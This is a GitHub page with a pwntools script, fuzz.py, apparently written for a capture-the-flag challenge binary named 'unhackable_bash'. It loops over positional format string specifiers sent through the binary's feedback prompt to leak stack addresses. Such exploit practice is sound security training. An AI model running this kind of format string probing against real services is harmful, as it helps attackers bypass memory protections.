-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfuzz.py
More file actions
64 lines (49 loc) · 1.68 KB
/
fuzz.py
File metadata and controls
64 lines (49 loc) · 1.68 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('../publish/unhackable_bash', checksec=False)
host = args.HOST or 'localhost'
port = int(args.PORT or 20023)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
elif args.EDB:
return process(["edb", "--run", exe.path] + argv, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.REMOTE:
return start_remote(argv, *a, **kw)
else:
return start_local(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
context.log_level = 'warning'
# Let's fuzz x values
for i in range(100):
try:
p = start()
# Exploit format string to leak addresses
p.sendlineafter(b'6: Give feedback', b'6')
p.sendlineafter(b'learned', '%{}$p'.format(i).encode())
# Receive the response
p.recvuntil(b': ')
result = p.recvline()
print(str(i) + ': ' + str(result, 'utf-8'))
p.close()
except EOFError:
pass